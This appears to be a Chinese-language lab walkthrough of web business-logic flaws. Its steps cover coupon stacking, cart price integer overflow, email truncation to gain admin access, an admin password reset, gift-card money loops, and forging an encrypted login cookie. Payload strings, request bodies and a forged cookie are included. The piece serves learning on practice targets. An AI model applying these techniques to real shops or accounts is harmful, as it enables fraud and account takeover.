过度信任客户端控制

image-20221228115239548

image-20221228115312594

image-20221228115423565

image-20221228115350800

高级逻辑漏洞

image-20221228115525879

image-20221228120029628

image-20221228120119161

image-20221228120136838

image-20221228120145307

不一致的安全控制

image-20221228120321946

image-20221228124005631

image-20221228124031223

image-20221228124103607

image-20221228124107664

image-20221228124130711

image-20221228124138160

image-20221228124144139

image-20221228124151841

有缺陷的业务规则执行

image-20221228124216141

image-20221228124228235

image-20221228124258224

image-20221228124318012

尝试再次使用这个优惠券

image-20221228124543416

image-20221228124501652

image-20221228124506895

SIGNUP30

尝试使用这个优惠券

image-20221228124624900

当交替使用这两个优惠券时可行

image-20221228124712476

image-20221228124721346

低级逻辑缺陷

image-20221228124746634

image-20221228130542121

image-20221228130555480

image-20221228130638159

可以看到到达一定数量变成了负数 说明价格已经超过了后端语言的最大整数值

清空购物车

image-20221228153213477

这次精准生成324个

image-20221228153239990

接着将数量精准控制到32123

image-20221228154136929

image-20221228154203965

接着通过购买金额小的商品将 价格控制为正数

image-20221228154338628

image-20221228154350058

image-20221228154652088

异常输入的不一致处理

image-20221228154728670

image-20221228160041491

尝试使用一个长 邮箱来注册

image-20221228160415957

image-20221228160442152

登录后发现我们的邮箱被截取了

image-20221228160509920

长度刚好是255位

image-20221228160539199

因此我们可以这样构造

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@dontwannacry.com.exploit-0a020023041f7954c47a7434018b00e8.exploit-server.net

image-20221228160715969

image-20221228160810180

image-20221228160819275

两用端点上的弱隔离

image-20221228161841642

image-20221228162251020

csrf=cEeDORihsFQAVYnvjXRcLdQbsuKh5f2k&username=administrator&new-password-1=1&new-password-2=1

image-20221228162320084

image-20221228162401905

工作流程验证不足

image-20221228162636266

尝试买个便宜的看看流程

image-20221228162723892

image-20221228162739187

直接发送这个页面

image-20221228162839352

通过有缺陷的状态机绕过身份验证

image-20221228163350811

image-20221228165027735

看到存在一个 /role-selector 请求

image-20221228165117777

尝试丢弃这个请求

image-20221228165141207

image-20221228165154020

无限金钱逻辑缺陷

image-20221228165531264

image-20221228165558805

image-20221228165521728

购买礼品卡

image-20221228165915661

image-20221228165953963

image-20221228170002662

image-20221228170034824

兑换礼品卡 发现金额上涨了

因此我们只需要连续发送这五个请求即可增加三块钱

image-20221228193140434

image-20221228193145875

image-20221228193151262

image-20221228193157948

image-20221228193203068

image-20221228193438605

image-20221228193502450

image-20221228193526259

image-20221228193553088

image-20221228193638618

image-20221228193813497

选中这五个

image-20221228193825441

image-20221228193859592

image-20221228194441185

image-20221228194852777

image-20221228194058127

image-20221228194928065

image-20221228194919581

直到最后一个响应为 302

image-20221228195045956

image-20221228195106184

image-20221228195126651

image-20221228200140303

image-20221228210756462

image-20221228210841731

通过加密 oracle 绕过身份验证

image-20221228210910078

image-20221228211045077

image-20221228211127341

返回了响应 不过是加密的

image-20221228211201684

image-20221228211251852

这次发送个错误 email 发现响应了我们的输入

image-20221228211331756

并且 在提交的时候会返回一个cookie 因此猜测可能在这个cookie中 是我们的email

image-20221228211353475

因此我们尝试给 stay-logged-in 解密

image-20221228212311355

csrf=OwsPvnxVGvbDlLQmwu9GkEWEz6f7SYI3&postId=8&comment=1&name=1&email=administrator:1672233054163&website=

尝试加密admin

image-20221228212421938

image-20221228212441881

不过这里多了几个字符 我们需要将其删去

image-20221228212730198

这里可能是多了几个字符的原因 我们尝试删去几个字节试试

image-20221228212954634

image-20221228213014136

image-20221228213126173

这里看到必须是16 的倍数

xxxxxxxxxadministrator:1672233054163

image-20221228213206428

KpixgTZJ%2fosvapy2X2PJ0%2f0G%2fl1gUwHzlDhn20kM58EZ1o5UjocNHnclqBviBttbdymw%2f5K8pCQFKFq4NDkPAw%3d%3d

image-20221228213246127

这次我们删除32个

image-20221228214549325

image-20221228214555071

Cookie:  stay-logged-in=%47%64%61%4f%56%49%36%48%44%52%35%33%4a%61%67%62%34%67%62%62%57%33%63%70%73%50%2b%53%76%4b%51%6b%42%53%68%61%75%44%51%35%44%77%4d%3d;

image-20221228214725362

image-20221228214739199